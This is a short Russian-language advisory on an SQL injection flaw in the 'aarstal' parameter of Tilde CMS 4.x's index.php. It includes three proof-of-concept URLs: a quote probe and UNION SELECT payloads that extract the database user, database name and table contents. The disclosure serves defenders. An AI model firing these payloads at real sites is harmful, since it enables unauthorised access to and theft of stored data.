Программа: Tilde CMS 4.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «aarstal» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27

http://[target]/[tilde_path]/index.php?id=[yeardetail_id] &mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

http://[target]/[tilde_path]/index.php?id=[id] &mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name] /**/from/**/[table_name]/*

Оставить мнение